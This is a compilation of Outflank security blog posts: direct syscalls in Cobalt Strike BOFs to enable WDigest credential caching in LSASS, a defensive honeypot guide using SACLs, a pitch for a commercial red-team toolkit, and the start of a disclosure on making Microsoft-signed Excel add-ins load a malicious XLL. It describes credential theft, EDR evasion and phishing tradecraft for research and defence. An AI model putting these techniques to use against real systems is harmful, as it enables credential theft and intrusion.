This PoC is based on the following excellent blogposts by _xpn_ and N4kedTurtle from Team Hydra. These blogs are a must read and contain all necessary details:

Both blogposts include PoC code to patch LSASS, so from that viewpoint our code is nothing new. Our PoC builds on this work and only demonstrates how we can utilize direct system calls within a Beacon Object File to provide a more OPSEC-safe way of interacting with the LSASS process and bypassing API hooks from Cobalt Strike.

Patch Limitations

The memory patches applied using this PoC are not reboot persistent, so after a reboot you must rerun the code. Furthermore, the memory offsets to the g_fParameter_UseLogonCredential and g_IsCredGuardEnabled global variables within the wdigest.dll module could change between Windows versions and revisions. We provided some offsets for different builds within the code, but these can change in future releases. You can add your own version offsets which can be found using the Windows debugger tools.

Detection

To detect credential theft through LSASS memory access, we can use a tool like Sysmon to monitor for processes opening a handle to the LSASS process. By monitoring for suspicious processes accessing LSASS, we create telemetry for detecting possible credential dumping activity.

Of course, there are more options to detect credential theft, for example using an advanced detection platform like Windows Defender ATP. But if you don’t have the budget and luxury of using these fancy platforms, then Sysmon is that free tool that can help fill the gap.
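
A minimal Sysmon rule for this could look as follows (a sketch; in practice you would tune the schema version and add exclusions for legitimate LSASS accessors):

<Sysmon schemaversion="4.50">
  <EventFiltering>
    <!-- Event ID 10 (ProcessAccess): log processes opening a handle to lsass.exe -->
    <ProcessAccess onmatch="include">
      <TargetImage condition="image">lsass.exe</TargetImage>
    </ProcessAccess>
  </EventFiltering>
</Sysmon>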

InlineWhispers

A few months after we published our Direct System Call blogpost, @Jackson_T published a great tool named SysWhispers. Sourced from the SysWhispers Git repository: 

“SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls.”

It is a great tool to automate the process of generating header/ASM pairs for any system call, which can then be used within custom built Red Teaming tools.

The .asm output file generated by the tool can be used within Visual Studio using the Microsoft Macro Assembler. If we want to use the system call functions generated from the SysWhispers output within a BOF project, we need some sort of conversion so they match the assembler template syntax. 

Our colleague @DaWouw wrote a Python script that can be used to transform the .asm output file generated by SysWhispers to an output file that is suitable within a BOF project.

It converts the output to match the assembler template syntax, so the functions can be used from your BOF code. We can manually enter which system calls are used in our BOF to prevent including unused system functions. The script is available within the InlineWhispers repository on our Github page:

https://github.com/outflanknl/InlineWhispers

Summary

In this blog we showed how we can use direct system calls within Cobalt Strike Beacon Object Files. To use direct system calls we need to write assembly using the assembler template syntax, so we can include assembly functions as inline-assembly. Visual Studio does not support inline-assembly for x64 processors but fortunately Mingw-w64 does.

To demonstrate the usage of direct system calls within a Beacon object file, we wrote a Proof-of-Concept code which can be used to enable WDigest credential caching. Furthermore, we wrote a script called InlineWhispers that can be used to convert .asm output generated by SysWhispers to an inline assembly header file suitable for BOF projects.

We hope this blogpost helps understanding how direct system calls can be implemented within BOF projects to improve OPSEC safety.

The post Direct Syscalls in Beacon Object Files appeared first on Outflank.

Catching red teams with honeypots part 1: local recon

By: Jarno
3 March 2021 at 15:16

This post is the first part of a series in which we will cover the concept of using honeypots in a Windows environment as an easy and cost-effective way to detect attacker (or red team) activities. Of course this blog post is about catching real attackers, not just red teams. But we picked this catchy title as the content is based on our red teaming experiences.

Upon mentioning honeypots, a lot of people still think of a system in the network hosting a vulnerable or weakly configured service. However, there is so much more you can do than spawning such a system. Think broad: honey files, honey registry keys, honey tokens, honey (domain) accounts or groups, etc.

In this post, we will cover:

  • The characteristics of an effective honeypot.
  • Walkthrough on configuring a file- and registry based honeypots using audit logging and SACLs.
  • Example honeypot strategies to catch attackers using popular local reconnaissance tools such as SeatBelt and PowerUp.

Characteristics of a good honeypot

For the purpose of this blog, a honeypot is defined as an object under your (the defender’s) control, that is used as a tripwire to detect attacker activities: read, use and/or modification of this object is monitored and alerted upon.

Let’s start by defining what a good honeypot should look like. A good honeypot should have at least the following characteristics:

  • Is easily discovered by an attacker (i.e. low hanging fruit)
  • Appears too valuable for an attacker to ignore
  • Cannot be identified as ‘fake’ at first sight
  • Abuse can be easily monitored (i.e. without many false positives)
  • Trigger allows for an actionable response playbook

It is extremely important that the honeypots you implement, adhere to the characteristics above. We have performed multiple red teaming gigs in which the client told us during the post-engagement evaluation session that they did implement honeypots using various techniques, however we did not stumble across them and/or they were not interesting enough from an attacker’s perspective.

Characteristics of local reconnaissance

When an attacker (or red teamer) lands on a system within your network, he wants to gain contextual information about the system he landed on. He will most likely start by performing reconnaissance (also called triage) on the local system to see what preventive and detective controls are in place on the system. Important information sources to do so are configuration and script files on the local system, as well as registry keys.

Let's say you are an attacker: what files and registry keys would you be interested in, and where would you look? Some typical examples of what an attacker will look for are:

  • Script folders on the local drive
  • Currently applied AppLocker configuration
  • Information on installed antivirus/EDR products
  • Configuration of log forwarding
  • Opportunities for local privilege escalation and persistence

A good example of common local recon activities can be gathered from the command overview of the Seatbelt project.
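
To make this more tangible, the lines below sketch a few PowerShell one-liners that mimic what such recon tools do under the hood. These are illustrative examples, not code taken from the tools themselves:

# Hunt for unattended install files that may contain credentials
Get-ChildItem -Path C:\Windows\Panther -Include Unattend.xml,Unattended.xml -Recurse -ErrorAction SilentlyContinue

# Read the configured AppLocker policy from the registry
Get-ChildItem 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2' -ErrorAction SilentlyContinue

# Check the state of the antivirus product (assumes the Defender cmdlets are present)
Get-MpComputerStatus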

Catching local enumeration tools

There are tons of attacker tools out there that automate local reconnaissance. These tools look at the system’s configuration and standard artefacts that could leak credentials or other useful information. Think of enumerating good old Sysprep/unattend.xml files that can store credentials, which are also read out by tools like SharpUp, PowerUp, and PrivescCheck:

Snippet of SharpUp code used to enumerate possible Unattended-related files

Next to files, there are also quite a few registry keys that are often enumerated by attackers and/or reconnaissance tooling. A few examples are:

Snippet of Seatbelt code used to enumerate the AppLocker policy, stored in registry

As a defender, you can build honeypots for popular files and registry keys that are opened by these tools and alert upon opening by suspicious process-user combinations. Let’s dive into how this can be achieved on a Windows system.

File- and registry-based honeypots

A file-based honeypot is a dummy file (i.e., a file not actually used in your environment) or a legitimate file (e.g., Unattend.xml or your Sysmon configuration file) for which audit logging is configured. You do this by configuring a so-called SACL (System Access Control List, more on this below) for the specific file. The same approach can be used to configure audit logging for a certain registry key.

The remainder of this post will guide you through configuring the audit logging prerequisites for file- and registry auditing, as well as the configuration of a SACL for a file/registry key.

First things first: what is a SACL?

You might have heard the terms SACL and DACL before. In a nutshell, it goes as follows: any securable object on your Windows system (i.e., file, directory, registry key, etc.) has a DACL and a SACL.

  • A DACL is used to configure who has what level of access to a certain object (file, registry entry, etc.).
  • A SACL is used to configure what type of action on an object is audited (i.e., when should an entry be written to the local system’s Security audit log).

So, amongst others, a SACL can be used to generate log entries when a specific file or registry key is accessed.
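
As a quick sanity check, you can inspect the SACL of an object from an elevated PowerShell prompt (reading SACLs requires administrative privileges; the file path below is just an example):

# Show the audit rules (SACL) currently configured on a file
(Get-Acl -Path 'C:\Windows\Panther\Unattend.xml' -Audit).Audit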

Prerequisite: configuring auditing of object access

To implement a file-based honeypot, we first need to make sure that auditing for object access is enabled on the system where we want to create the file- or registry-based honeypot. The required object auditing categories are not enabled by default on a Windows system.

Enabling auditing of file- and registry access can be done using a Group Policy. Create a new GPO and configure the options below:

  • 'Audit File System': audit 'Success' and 'Failure'.
  • 'Audit Registry': audit 'Success' and 'Failure'.

These policies can be found under 'Computer Configuration' -> 'Policies' -> 'Windows Settings' -> 'Security Settings' -> 'Advanced Audit Policy Configuration' -> 'Object Access':

Once you have configured your GPO, you can use the auditpol command line utility to verify that the GPO has been applied successfully. Below is example output of the command on a test system:

auditpol /get /category:"object access"
Auditpol output showing that file system- and registry auditing is configured

NB: if the configured settings are not being applied successfully, your environment might have GPOs configured that make use of old-school high-level audit policies instead of advanced audit policies. Review if this is the case and migrate them to advanced audit policies. If you have multiple GPOs that specify ‘Advanced Audit Policies’, you might need to enable ‘Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings’ in your ‘Default Domain Policy’.

Configuring auditing for a specific file

Now that auditing of object access is configured, let's enable access logging for a specific file. We do this by configuring a so-called SACL. Right-click -> Properties on the file you want to configure access monitoring for, go to the Security tab -> Advanced -> Auditing, and configure an auditing rule for the principal 'Everyone' with 'List folder / read data' selected.

Configuring auditing for a specific file

You can also do so using PowerShell. For this, use the code snippet below.

# File for which auditing is to be configured
$FileToAudit = "c:\Windows\Panther\Unattend.xml"

# Set properties for new SACL
$AuditIdentity = "Everyone"       # who to audit
$AuditOnAction = "ReadData"       # what action to audit. Other actions could be: "Write, TakeOwnership". More info: https://docs.microsoft.com/en-us/dotnet/api/system.security.accesscontrol.filesystemrights?view=net-5.0
$AuditType = "Success"            # Audit action "Success"
$InheritanceFlags = "None"        # Not inherited by child objects
$PropagationFlags = "None"        # Don't propagate to child objects
$NewAuditACE = New-Object System.Security.AccessControl.FileSystemAuditRule($AuditIdentity,$AuditOnAction,$InheritanceFlags,$PropagationFlags,$AuditType)

# Get the currently configured ACL
$Acl = Get-Acl $FileToAudit -Audit

# Add the ACE, preserving previously configured entries
$Acl.AddAuditRule($NewAuditACE)

# Apply the new configuration
$Acl | Set-Acl | Out-Null

Making a file look more interesting/legit

For the purpose of this blog post I created an Unattend.xml file in the 'c:\windows\panther' folder. It has a date modified of today, in contrast to all the other files, which have their date modified set to the installation time of this host. Unattend.xml is normally not modified after the installation and configuration of the system is finished. The very recent date modified could tip off an attacker that this is a dummy file, causing them to refrain from opening it.

Let's 'timestomp' the fake Unattend.xml file, making it look like it was created around the installation date of the host:

$file=(gi Unattend.xml);
$date='02/15/2021 08:04';
$file.LastWriteTime=$date;
$file.LastAccessTime=$date;
$file.CreationTime=$date 
Altering the ‘date modified’ value of a file using PowerShell

Generated log entry for file access

Once audit logging is configured, an event with event ID 4663 is generated every time the file is accessed. This log entry contains the user and process that were used to access the file.

Log entry showing that file Unattend.xml was accessed
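
For quick local verification, before the events reach your central log solution, you can query the Security event log with PowerShell (elevated prompt required; the file name matches the example above):

# Find recent 4663 events that reference our honey file
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4663 } -MaxEvents 200 |
    Where-Object { $_.Message -match 'Unattend\.xml' } |
    Select-Object TimeCreated, Message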

Configuring auditing for a specific registry key

We can use the same approach to configure auditing for registry settings. Let's configure audit logging to detect the enumeration of the configured AppLocker policy. Open the registry editor and navigate to the AppLocker policy location: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\SrpV2'. Right-click the 'SrpV2' key -> 'Permissions...', click 'Advanced' and use the 'Auditing' tab of the 'Advanced Security Settings' dialog to configure an auditing rule for the principal 'Everyone', and select 'Query Value' (screenshot below).

Configuring auditing for a specific registry key

NB: if you do not have AppLocker configured within your environment, you can create a dummy registry entry in the location above. Another option is to deploy a dummy AppLocker configuration with default rules, without actually enforcing 'block' or 'audit' mode in the AppLocker policy itself. This does create registry entries under SrpV2, but does not enforce an AppLocker configuration. As with the file-based honeypot, the SACL can also be configured using PowerShell:

#Registry key for which auditing is to be configured
$RegKeyToAudit = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2"

# Set properties for new SACL
$AuditIdentity = "Everyone"       # who to audit
$AuditOnAction = "QueryValue"       # what action to audit. Other actions could be: "CreateSubKey, DeleteSubKey". More info: https://docs.microsoft.com/en-us/dotnet/api/microsoft.win32.registrykey?view=dotnet-plat-ext-5.0#methods
$AuditType = "Success"            # Audit action "Success"
$InheritanceFlags = "ContainerInherit,ObjectInherit"        # Entry is inherited by child objects
$PropagationFlags = "None"        # Don't propagate to child objects
$NewRegistryAuditACE = New-Object System.Security.AccessControl.RegistryAuditRule($AuditIdentity,$AuditOnAction,$InheritanceFlags,$PropagationFlags,$AuditType)

# Get the currently configured ACL
$Acl = Get-Acl $RegKeyToAudit -Audit

# Add the ACE, preserving previously configured entries
$Acl.AddAuditRule($NewRegistryAuditACE)

# Apply the new configuration
$Acl | Set-Acl | Out-Null 

Generated log entry for registry access

Once audit logging is configured, an event with event ID 4663 is generated every time the registry key is accessed. This log entry contains the user and process that were used to access the registry key.

Log entry showing that the AppLocker configuration was enumerated

Centralised logging & alerting

Now that file and registry auditing is configured on the system, make sure that at least event ID 4663 is forwarded to your central log management solution. If you have yet to configure Windows log forwarding, please refer to Palantir's blog post for an extensive overview of Windows Event Forwarding.

Alerting and contextual awareness

After making sure that the newly generated events are available in your central log management solution, you can use this data to define alerting rules or perform hunts. While doing this, contextual information is important. Every environment is different. For example: there might be periodic processes in your organisation that access files for which you configured file auditing.

Things to keep in mind when defining alerting rules or performing hunts:

  • Baseline normal activity: what processes and subjects legitimately access the specific file on disk periodically? The sketch below can serve as a starting point.
  • Be careful not to exclude a broad list of processes from alerting. The example event ID 4663 screenshot earlier in this post shows dllhost.exe as the source process opening a file; this is the case when you copy/paste a file.
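
A minimal PowerShell hunting sketch that summarises which user/process combinations generate 4663 events, assuming you run it locally on the monitored system (in practice you would run the equivalent query in your log management solution):

# Summarise 4663 events per user/process combination to baseline legitimate access
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4663 } |
    ForEach-Object {
        $xml = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            User    = $data['SubjectUserName']
            Process = $data['ProcessName']
            Object  = $data['ObjectName']
        }
    } |
    Group-Object User, Process |
    Sort-Object Count -Descending |
    Select-Object Count, Name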

Suggestions for files and registry keys to track using SACLs

When creating file-based honeypots, always keep in mind the characteristics of a good honeypot covered at the beginning of this post: easy for an attacker to discover, too valuable to ignore, not identifiable as fake, easy to monitor, and backed by an actionable response playbook.

Also keep in mind that reconnaissance tools enumerate file and registry locations regardless of what software is installed. Even if you do not use specific software within your environment, you can create certain dummy files or registry locations. An added benefit of this: fewer false positives out of the box for your environment and less fine-tuning of alerting required.

A couple of examples that could be worth implementing:

  • AppLocker configuration. Any read access to the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\SrpV2, from an unexpected process.
  • Saved RDP sessions. RDP sessions can be stored in the local user’s registry. Any read access to the registry key HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client, from an unexpected process.
  • Interesting looking (dummy) script. If you have a local scripts folder on workstations, add a dummy script with a juicy name like resetAdminpassword.ps1 and monitor for read access. Make sure the file has some dummy content. Content of this file should not be able to influence the environment.
  • Browser credential stores. Any read access to browser credential stores such as those of Chrome or Firefox, that does not originate from the browser process itself. If you do not use a certain browser in your environment, planting fake browser credential stores in users' roaming profiles can also be used as a trigger.
  • Other credential stores/private keys. Any read access to SSH private keys, Azure session cookie files, or password databases that are used by users, that does not originate from an expected process.
  • Sysmon configuration file. Any read access to the Sysmon configuration file of the local system, that does not originate from the Sysmon process.
  • Windows installation/configuration artefacts. Any read access to Unattend.xml in C:\Windows\Panther, as covered in this blog post.
  • Interesting (dummy) files on NETLOGON. Any read access to a file that looks like a legacy script or configuration file, located on the domain controller’s NETLOGON share.

Do you have suggestions for other great honeypots? Ping me on Twitter.

Future posts in this series will cover using SACLs for, amongst others, domain-based reconnaissance and specific attacks.

The post Catching red teams with honeypots part 1: local recon appeared first on Outflank.

Our reasoning for Outflank Security Tooling

2 April 2021 at 12:26

TLDR: We open up our internal toolkit commercially to other red teams. This post explains why.

Is blue catching your offensive actions? Are you relying on public or even commercial tools that are flagged by AV and EDR? Hesitant to invest deeply in offensive research and development? We've been there. But several years ago, we made the switch and started heavily investing in research. Our custom toolset was born.

Today we open up our toolset to other red teams in a new service called Outflank Security Tooling, abbreviated OST. We are super(!) excited about this. We truly think this commercial model is a win-win and will help other red teams and subsequently many organisations worldwide. You can find all the details at the product page. But there is more to be explained about why we do this, which is better suited in a blog post.

In this post you will find our reasoning for this service, our take on red team evolution, the relation to that other OST abbreviation and a short Q&A.

Our inhouse offensive toolset opened up for others

OST is a toolset that any red teamer would want in his arsenal. Tools that we use in our own red teaming engagements. Tools that my awesome colleagues have spent, and continue to spend, significant time researching, developing and maintaining. Proven tools that get us results.

OST is not another C2 framework. It’s an addition. A collection of tools for all stages of a red teaming operation. The following is a selection of the current toolset:

  • Office Intrusion Pack: abuse non-well-known tricks in Office to get that initial foothold.
  • Payload Generator: centralised and structured way to generate different kinds of payloads. No more heavy programming knowledge required to get payloads with awesome anti-forensics, EDR-evasion, guard-rails, transformation options, etc.
  • Lateral Pack: move lateral while staying under the radar of EDRs. A powerful collection of different ways for lateral movement.
  • Stage1 C2: OPSEC focussed C2 framework for stage 1 operations.
  • Hidden Desktop: operate interactive fat-client applications without the user experiencing anything. It’s pure interactive desktop magic.

Overall principles in a changing toolset

The toolset will change over time as we continue our R&D and as we adapt to the changing demand. But the following overall principles will stay the same:

  1. Awesome functionality that a red team would want.
  2. OPSEC safe operations that help you stay undetected.
  3. Easy to use for different skill levels within your team.
  4. Supporting documentation on concepts and details so you know what you are using.

You can find all details at the product page here. Now let’s get into our reasoning.

Public tools for red teams will not cut it anymore

Looking at our industry we have seen a strong rise in strength of blue teams the last couple of years. Both in tools and skills. This means far more effective detection and response. This is a good thing. This is what we wanted!

But this also means that public tools for red teams are becoming less and less effective against a more advanced blue team. For example, PowerShell used to be an easy choice. But nowadays any mature blue team is more than capable of stopping PowerShell based attacks. So red moves their arsenal to .NET. But proper EDRs and AMSI integration are upon us, so .NET is not ideal anymore. It's a matter of time before these attacks follow the same path as PowerShell. This pushes red into the land of direct system calls and low-level programming. But the battle has started in this area as well.

This is a good thing, as it also pushes the real attackers to new territory. Hopefully shedding another layer of cybercriminals along the way.

In other words: to stay relevant, red teams need to invest heavily in their arsenal and skills.

This means more in-depth research for red teams

Doing in-depth R&D is not for the faint of heart. It requires a distinct combination of knowledge and skills. Not only does the level of detailed knowledge become a challenge, the broadness of knowledge does as well. For example: a red team can have in-depth knowledge of low-level Windows protocols for lateral movement. But without knowledge on how to get an initial foothold, you miss a piece of the puzzle required for a complete operation.

It is becoming harder to have all required R&D skills in your red team. And we believe that is totally OK.

Novel R&D is not the role of a red team per se

At its core, doing novel R&D is not per se the role of the red team. Sure, it might help. But the end goal of red teams is helping their clients become more secure. They do this by making an impact at their client via a realistic cyber-attack, and subsequently advising on how to improve. Super l33t R&D can help. But it is a means to an end.

Take the following somewhat extreme examples:

  1. Red team A does not have the ability to do novel research and tool development. But it does have the ability to understand and use tools from others in their ops very effectively.
  2. Red team B does great detailed research and has the best custom tools. They built everything themselves. But they fail to execute this in a meaningful manner for their clients.

Red team B fails to help its client. Red team A is by far the more successful and effective red team.

This is not a new thing. We see it throughout our industry. Does a starting red team develop its own C2? No, it buys one of the available options. Even we – a pretty mature red team – still buy Cobalt Strike. Because it helps us to be more effective in our work.

This got us thinking. And eventually made us decide to start our OST service.

We founded Outflank to do red teaming right

Back in 2016, we founded Outflank because we wanted to:

  1. Help organizations battling the rising risk of targeted cyber-attacks.
  2. Push the industry with research.
  3. Have some fun along the way.

Starting with just 4 people, we were a highly specialized and high performing team. Not much has changed since then. Only our number has increased to 7. We don't hire to grow as an objective. We grow when we find the right person on a skill and personal level. It is the way we like our company to operate.

This has many benefits. Not least a client base full of awesome companies that we are truly honoured to serve. And as we help them progress with their security, we are having fun along the way. This is what I call a win-win situation.

OST helps with heavy R&D economics

Our Outflank model does not scale well. We can’t serve every company on the planet and make it more secure. But in a way, we do want to help every company in the world. Or at least as many as we can. If we can’t serve them all, maybe we can at least have our tools serve them indirectly. Why not share these tools and in a way have them help companies worldwide?

This new model also helps with the economics of heavy R&D. As discussed earlier, modern red teaming requires tremendous research and development time. That is OK. We love doing that. But there comes a point where huge development time isn't commercially feasible for our own engagements anymore. With OST, we have a financial incentive for heavy research, which in turn helps the world become more secure.

Or to put it boldly: OST enables us to finally take up major research areas that we were holding off due to too heavy R&D time. This then flows into the OST toolset, allowing customers and their clients to benefit.

We love sharing our novel tools and research

Our final reason is that we are techies at heart who love sharing our research at conferences, on blogs and on GitHub. We have done so a lot, especially if you look at the size of our little company. We would be very sad if we had to stop doing this.

But when you find your own previously shared research and tools in breach investigation reports on cyber criminals and state actors, it makes you think (example 1, example 2, example 3).

This brings me to that other OST abbreviation.

We are not blind to the public OST debate

OST is also an abbreviation for Offensive Security Tooling. You know, that heated discussion (especially on Twitter) between vocal voices on both blue and red side. A discussion where we perhaps have forgotten we are in this together. Red and blue share the same goal!

All drama aside, there is truth in the debate. Here at Outflank we highlighted the following arguments that we simply can’t ignore:

  1. Publicly available offensive tools are used in big cyber-attacks.
  2. Researchers sharing their offensive tools make other red teams (and blue teams) more effective. This in turn makes sure the defensive industry goes forward.
  3. The sharing of new research and tools is a major part of our industry’s ability to self-educate. This helps both red and blue.

The Outflank Security Tooling service contains tools built upon our research that we did not share before. We haven't shared this because some of this research resulted in mayhem-level tools. We don't want these in the hands of cybercriminals and state actors. This decision was made well before the OST debate even started.

We counter the first and second arguments by not releasing our very powerful tools to the wide public, but to interested red teams.

We counter the third argument by continuing to present our research at conferences and share some PoCs of our non-mayhem-level tools. This way we can still contribute to the educational aspect that makes our industry so cool.

With our OST service we believe we make a (modest) step to a more secure world.

We are excited about OST and hope you are as well

We think OST is awesome! We believe it will allow other red teams to keep being awesome and help their clients. At the same time, OST provides an economic incentive to keep pushing for new research and tools that our customers will benefit from.

While we continue to release some of our non-dangerous research and PoCs to the public, OST allows us to share the dangerous tools only to selected customers. And have some fun while doing this. Again, a win-win situation.

We are excited about bringing OST to market. We hope you are as well!

This is not the end of the story

Instead, this is the start of an adventure. An adventure during which we have already learned an awful lot about things such as the 'Intrusion Software' part of the Wassenaar Arrangement, export controls and how to embed this technically into a service.

We believe that sharing information will make the world a better place. So, we will make sure to share our lessons learned during this adventure in future blog posts and at conferences. Such that our industry can benefit from this.

Q&A

Does this mean you will stop publishing tools on your GitHub page?

No, sharing is at our core!

We will continue releasing proof-of-concept code and research on our GitHub page. We will keep contributing to other public offensive tools. Only our most dangerous tools will be released in a controlled manner via the OST service. Non-directly offensive tools such as RedELK will remain open source.

You can expect new public tool releases in the future.

Is OST available for everyone?

Due to the sensitivity of the tools, our ethical standards and because of export controls on intrusion software, we will be selective in which red teams we can serve with OST.

It is our obligation to prevent abuse of these tools in cybercriminal or geopolitical attacks. This will limit our clientele for sure. But so be it. We need clients that we can trust (and we take some technical measures against tool leakage of course).

Can I make my low skill pentest team be a l33t red team with OST?

Not really, and this is not the goal of OST. A toolset is an important part of a red teaming operation. But a team of skilled operators is at least as important!

We want red teams to understand what is happening under the hood when our tools are used. And OST supports them in this, for example by in-depth documentation of the techniques implemented in our tools.

Can I get a demonstration of the OST toolkit?

Yes.

The post Our reasoning for Outflank Security Tooling appeared first on Outflank.

A phishing document signed by Microsoft – part 1

9 December 2021 at 12:27

This blog post is part of a series of two posts that describe weaknesses in Microsoft Excel that could be leveraged to create malicious phishing documents signed by Microsoft that load arbitrary code.

These weaknesses have been addressed by Microsoft in the following patch: CVE-2021-28449. This patch means that the methods described in this post are no longer applicable to an up-to-date and securely configured MS Office install. However, we will uncover a largely unexplored attack surface of MS Office for further offensive research and will demonstrate practical tradecraft for exploitation.

In this blog post (part 1), we will discuss the following:

  • The Microsoft Analysis ToolPak for Excel and vulnerabilities in the XLAM add-ins that are distributed as part of it.
  • Practical offensive MS Office tradecraft which is useful for weaponizing signed add-ins which contain vulnerabilities, such as transposing third party signed macros to other documents.
  • Our analysis of Microsoft’s mitigations applied by CVE-2021-28449.

We will update this post with a reference to part 2 once it is ready.

An MS Office installation comes with signed Microsoft Analysis ToolPak Excel add-ins (.XLAM file type) which are vulnerable to multiple code injections. An attacker can embed malicious code without invalidating the signature for use in phishing scenarios. These specific XLAM documents are signed by Microsoft.

The resulting exploit/maldoc supports roughly all versions of Office (x86+x64) for any Windows version against (un)privileged users, without any prior knowledge of the target environment. We have seen various situations at our clients where the specific Microsoft certificate is added as a Trusted Publisher (meaning code execution without a popup after opening the maldoc). In other situations a user will get a popup showing a legit Microsoft signature. Ideal for phishing!

Research background

At Outflank, we recognise that initial access using maldocs is getting harder due to increased effectiveness of EDR/antimalware products and security hardening options for MS Office. Hence, we continuously explore new vectors for attacking this surface.

During one of my research nights, I started to look in the MS Office installation directory in search of example documents to further understand the Office Open XML (OpenXML) format and its usage. After strolling through the directory C:\program files\Microsoft Office\ for hours and hours, I found an interesting file that was doing something weird.

Introduction to Microsoft’s Analysis Toolpak add-in XLAMs

The Microsoft Office installation includes a component named “Microsoft’s Analysis ToolPak add-in”. This component is implemented via Excel Add-ins (.XLAM), typically named ATPVBAEN.XLAM and located in the office installation directory. In the same directory, there is an XLL called analys32.xll which is loaded by this XLAM. An XLL is a DLL based Excel add-in.

The folder and file structure is the same for all versions and looks like this:

The Excel macro enabled add-in file (XLAM) file format is relatively similar to a regular macro enabled Excel file (XLSM). An XLAM file usually contains specific extensions to Excel so new functionality and functions can be used in a workbook. Our ATPVBAEN.XLAM target implements this via VBA code which is signed by Microsoft. However, signing the VBA code does not imply integrity control over the document contents or the resources it loads…
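
Since an XLAM is just an OpenXML (zip) container, you can inspect its structure yourself. A quick sketch using PowerShell (the source path is an example for a 64-bit click-to-run install and may differ on your system):

# Copy the add-in, unpack it as a zip archive and inspect its contents
Copy-Item 'C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\ATPVBAEN.XLAM' "$env:TEMP\atp.zip"
Expand-Archive -Path "$env:TEMP\atp.zip" -DestinationPath "$env:TEMP\atp"
Get-ChildItem -Recurse "$env:TEMP\atp"   # note xl\vbaProject.bin, which holds the signed VBA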

Malicious code execution through RegisterXLL

So, as a first attempt I copied ATPVBAEN.XLAM to my desktop together with a malicious XLL which was renamed to analys32.xll. The signed XLAM indeed loaded the unsigned malicious XLL and I had the feeling that this could get interesting.

Normally, the signed VBA code in ATPVBAEN.XLAM is used to load an XLL in the same directory via a call to RegisterXLL. The exact path of this XLL is provided inside an Excel cell in the XLAM file. Cells in a worksheet are not signed or validated and can be manipulated by an attacker. In addition, there is no integrity check upon loading the XLL. Also, no warning is given, even if the XLL is unsigned or loaded from a remote location.

We managed to weaponize this into a working phishing document loading an XLL over WebDAV. Let’s explore why this happened.

No integrity checks on loading unsigned code from a signed context using RegisterXLL

ATPVBAEN.XLAM loads ANALYS32.XLL and uses its exported functions to provide functionality to the user. The XLAM loads the XLL using the following series of functions which are analysable using the olevba tool. Note that an XLL is essentially just a DLL with the function xlAutoOpen exported. The highlighted variables and functions are part of the vulnerable code:

> olevba ATPVBAEN.XLAM
olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools
=================================================================
VBA MACRO VBA Functions and Subs.bas
in file: xl/vbaProject.bin - OLE stream: 'VBA/VBA Functions and Subs'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' ANALYSIS TOOLPAK  -  Excel AddIn
' The following function declarations provide interface between VBA and ATP XLL.

' These variables point to the corresponding cell in the Loc Table sheet.
Const XLLNameCell = "B8"
Const MacDirSepCell = "B3"
Const WinDirSepCell = "B4"
Const LibPathWinCell = "B10"
Const LibPathMacCell = "B11"

Dim DirSep As String
Dim LibPath As String
Dim AnalysisPath As String

The name of the XLL is saved in cell B8 and the Windows library path in cell B10. This looks as follows, if you unhide the worksheet:
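
The 'Loc Table' sheet is hidden by default. If you want to inspect these cells yourself, a small Excel COM sketch like the one below can make it visible (assumes Excel is installed and a local copy of the XLAM; the sheet name is taken from the VBA above):

# Open a copy of the add-in and unhide the 'Loc Table' worksheet
$excel = New-Object -ComObject Excel.Application
$excel.Visible = $true
$wb = $excel.Workbooks.Open("$env:TEMP\ATPVBAEN.XLAM")
$wb.IsAddin = $false                          # show the workbook window
$wb.Sheets.Item('Loc Table').Visible = -1     # -1 = xlSheetVisible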

The auto_open() function is called when the file is opened and the macros are enabled/trusted.

' Setup & Registering functions

Sub auto_open()
    Application.EnableCancelKey = xlDisabled
    SetupFunctionIDs
    PickPlatform             
    VerifyOpen               
    RegisterFunctionIDs      
End Sub

First, the PickPlatform function is called to set the variables. LibPath is set here to LibPathWinCell's value (which is under the attacker's control) in case the workbook is opened on Windows.

Private Sub PickPlatform()
    Dim Platform

    ThisWorkbook.Sheets("REG").Activate
    Range("C3").Select
    Platform = Application.ExecuteExcel4Macro("LEFT(GET.WORKSPACE(1),3)")
    If (Platform = "Mac") Then
        DirSep = ThisWorkbook.Sheets("Loc Table").Range(MacDirSepCell).Value
        LibPath = ThisWorkbook.Sheets("Loc Table").Range(LibPathMacCell).Value
    Else
        DirSep = ThisWorkbook.Sheets("Loc Table").Range(WinDirSepCell).Value
        LibPath = ThisWorkbook.Sheets("Loc Table").Range(LibPathWinCell).Value
    End If
End Sub

The function VerifyOpen will try to locate the XLL named in XLLNameCell = "B8": first in the directory of the workbook itself, then via the system's PATH, and finally in the path defined by LibPath. Note: all (red/orange) highlighted variables are under the attacker's control and vulnerable. We are going to focus on attacking the code highlighted in red.

Private Sub VerifyOpen()
    XLLName = ThisWorkbook.Sheets("Loc Table").Range(XLLNameCell).Value

    theArray = Application.RegisteredFunctions
    If Not (IsNull(theArray)) Then
        For i = LBound(theArray) To UBound(theArray)
            If (InStr(theArray(i, 1), XLLName)) Then
                Exit Sub
            End If
        Next i
    End If

    Quote = String(1, 34)
    ThisWorkbook.Sheets("REG").Activate
    WorkbookName = "[" & ThisWorkbook.Name & "]" & Sheet1.Name
    AnalysisPath = ThisWorkbook.Path

    AnalysisPath = AnalysisPath & DirSep
    XLLFound = Application.RegisterXLL(AnalysisPath & XLLName)
    If (XLLFound) Then
        Exit Sub
    End If

    AnalysisPath = ""
    XLLFound = Application.RegisterXLL(AnalysisPath & XLLName)
    If (XLLFound) Then
        Exit Sub
    End If

    AnalysisPath = LibPath
    XLLFound = Application.RegisterXLL(AnalysisPath & XLLName)
    If (XLLFound) Then
        Exit Sub
    End If

    XLLNotFoundErr = ThisWorkbook.Sheets("Loc Table").Range("B12").Value
